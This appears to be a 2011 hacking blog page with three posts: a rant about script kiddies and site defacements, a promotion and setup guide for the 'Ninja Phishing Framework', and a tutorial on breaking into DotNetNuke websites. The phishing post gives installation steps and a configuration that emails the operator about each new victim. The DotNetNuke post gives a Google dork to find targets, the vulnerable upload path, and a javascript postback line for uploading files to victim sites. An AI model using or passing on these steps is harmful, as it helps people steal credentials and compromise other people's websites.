Showing posts with label easiest hacking ever done. Show all posts
Showing posts with label easiest hacking ever done. Show all posts

Wednesday, December 14, 2011

Hacking wave in wrong direction

Bros today every body is proving themselves in some or the other way. on one side pakistani hackers hack indian and other US sites and on other side indian hackers like lucky and indishell hack pakistani sites. people love to see hacked site they just love it like anything. thats why thehackernews type of websites are getting more attention and they are doing good by providing information and alerting peoples. but that also creates some negative thinking in peoples mind due to different nationalities.and there is a wild uproar of script kiddys today they think that they can hack sites by just SCANNING AND LEARNING from other websites/blogs its not that fucking easy (sorry for language). so a good request to them that they should study now and then make use of their study to learn hacking by themselves. do you know what is hacking its not like a guy sitting with a big screen pc eating pizzas and defacing FBI websites lol thats pretty old.hacking is curiosity to do something new its the attitude that i want to do some thing . so now i think some or might all script kiddys will study that how computers work and how programs work. and some times exploit writers put some unwanted codes in their script to keep it unusable to script kiddys. so now do HAPPY HACKING.

Saturday, October 29, 2011

Ninja Phishing Framework (total phishing SUITE)


Description


It’s a free and open source phishing framework (SCRIPT)that helps the social-engineers in phishing attacks. and it’s includes alot of phishing pages and more stuff that helps you in phishing.the application is coded in PHP,XHTML,CSS,and Javascript.





Features


  • About 33 phishing page.
  • Php mailer let you send a message to a several emails.
  • Phishing by tabnabbing.
  • Ip captue.
  • Several browsers exploits. (untested)
  • Packer lets you to crypt exploits to bypass antiviruses.
  • Uploader to upload your files.
  • XSS simple exploiter.
  • Search to let you search in the application's database for a victim.
  • iframes.
download from here 
 here is tutorial how to install it 
you can use free hosting sites like 0fees.net, zymic.com etc 

Requirements:
  • PHP interpreter.
  • MySQL Database.
  • Text Editor.
  • Browser.

First we will need to create a  MySQL database.
$ mysql -u USERNAME -p PASSWORD
mysql> CREATE DATABASE ninja_pf;
Now we need to edit the configuration file
$mysql_hostname = "localhost"; // MYSQL SERVER (DEFAULT:localhost)
$mysql_username = "USERNAME"; // << MYSQL USERNAME
$mysql_password = "PASSWORD"; // << MYSQL USERNAME's PASSWORD
$mysql_database = "ninja_pf"; // << MYSQL DATABASE NAME
$email_notification = TRUE; // << IF YOU HAVE A NEW VICTIM THE APPLICATION WILL SEND YOU A MESSAGE
$redirect_to = "http://google.com"; // << REDIRECT TO, AFTER THE VICTIM INSERTED HIS/HER DATA
After that you will go to installation page. (http://yoursite.com/[PATH]/install/)
click continue
click create tables.the tables names must be colored green
create your account
now you can go to the administration page (http://yoursite.com/[PATH]/admin

Thursday, September 22, 2011

DNN (DotNetNuke) Hacking


Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Below are the easy steps to implement the attack:
  • First use a google dork to find the appropriate target.
inurl:”/portals/0″ site:.com
  • You can change com to your desired domain name like bd ph ae
  • Now search your website on the google after searching you will get many websites choose any one of it.
  • Its time to check the required vulnerability on the website just place this code after the web address.
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  • For example if you got www.victim.com
  • Replace it www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  • If you will get this screen means this web is going to hack.
  • Now choose the third option “A File On Your Site” And than paste this java code on your address bar.
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
  • It will allow you to upload a files on this website you can upload text ~ swf ~ jpg ~ gif ~ pdf ~ Files.
  • After uploading files you can find your file on this address www.victim.com/portals/0/yourfile.extension
here extension is txt jpg swf etc.

Twitter Delicious Facebook Digg Stumbleupon Favorites More